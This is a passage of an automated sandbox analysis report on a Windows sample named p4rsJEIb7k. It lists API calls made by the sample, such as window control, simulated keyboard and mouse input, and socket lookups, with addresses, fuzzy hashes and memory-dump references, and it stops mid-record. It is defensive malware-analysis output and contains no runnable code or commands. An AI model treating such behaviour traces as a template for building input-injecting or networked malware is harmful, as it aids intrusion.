                                                                                                                • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 896007046-0
                                                                                                                • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                • SendMessageW.USER32(019F1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                • SendMessageW.USER32(019F1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                • String ID: 0vH
                                                                                                                • API String ID: 327565842-3662162768
                                                                                                                • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                • GetFocus.USER32 ref: 00448B1C
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429747543-0
                                                                                                                • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 3850602802-3636473452
                                                                                                                • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                APIs
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                • String ID:
                                                                                                                • API String ID: 3985565216-0
                                                                                                                • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                                                • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                                                                • TlsGetValue.KERNEL32(00000005,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169AD
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004169C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                • Opcode ID: f1787378902819e9947f97c0fd6b8d9b320c13b2552bb88f8caa1f2ac1665e6d
                                                                                                                • Instruction ID: e5bba5b00aa6f8354d24bce9220d26f317535e3d8edc7be22519ce0301cf3cdb
                                                                                                                • Opcode Fuzzy Hash: f1787378902819e9947f97c0fd6b8d9b320c13b2552bb88f8caa1f2ac1665e6d
                                                                                                                • Instruction Fuzzy Hash: 4CF0C2B0210111AF8F209B35DD449EF3A98AF403657064437FC1DD62A0DB38DC81C79D
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                                                                                                                • TlsGetValue.KERNEL32(00000005,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A28
                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00416A43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                • Opcode ID: 0b3d26fac8f7b222a059dde4d81d242a9bd92865164bd8a543a794d3b2e1d27d
                                                                                                                • Instruction ID: 6b6853f7d3ee3eb9e65f39b7335b34cb1b7d5f0f3521d7c85aee421bb533db53
                                                                                                                • Opcode Fuzzy Hash: 0b3d26fac8f7b222a059dde4d81d242a9bd92865164bd8a543a794d3b2e1d27d
                                                                                                                • Instruction Fuzzy Hash: 65F04430600115AB8B209B75DD44ADF3F99AF423E0715843BFC18E62A0EB38DD41879C
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                • API String ID: 2574300362-3261711971
                                                                                                                • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWidegethostbynameinet_addr
                                                                                                                • String ID:
                                                                                                                • API String ID: 867222529-0
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3220332590-0
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(00000001,004832AC,00000001,?,00000000,00000100,00000000,?,?,?,004229F0,00000001,?,?,?,?), ref: 00422835
                                                                                                                • GetLastError.KERNEL32(?,004229F0,00000001,?,?,?,?,?,?,?,?,00000001,?,?,?,00000001), ref: 00422847
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000100,00000000,?,?,?,004229F0,00000001,?,?), ref: 004228AC
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,00000001,?,?,?,00000001,?), ref: 00422916
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00422924
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,?,00000000,00000100,00000000,?,?,?,004229F0,00000001,?,?,?), ref: 00422999
                                                                                                                  • Part of subcall function 0042540D: GetCPInfo.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,?,0041D4AE,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00425458
                                                                                                                  • Part of subcall function 0042540D: GetCPInfo.KERNEL32(00000000,00000001,?,?,?,0041D4AE,00000000,00000000,?), ref: 00425471
                                                                                                                  • Part of subcall function 0042540D: MultiByteToWideChar.KERNEL32(00000100,00000001,0041D4AE,00000000,?,00000000,?,?,?,?,?,?,0041D4AE,00000000,00000000,?), ref: 0042551E
                                                                                                                  • Part of subcall function 0042540D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 00425539
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$StringType$Info$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2250435928-0
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                • SendInput.USER32 ref: 0044C6E2
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2221674350-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                • GetMenu.USER32 ref: 004776AA
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountItemStringWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2847105600-0
                                                                                                                APIs
                                                                                                                • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                Similarity
                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4189319755-0
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 3368777196-0
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1976402638-0
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                APIs
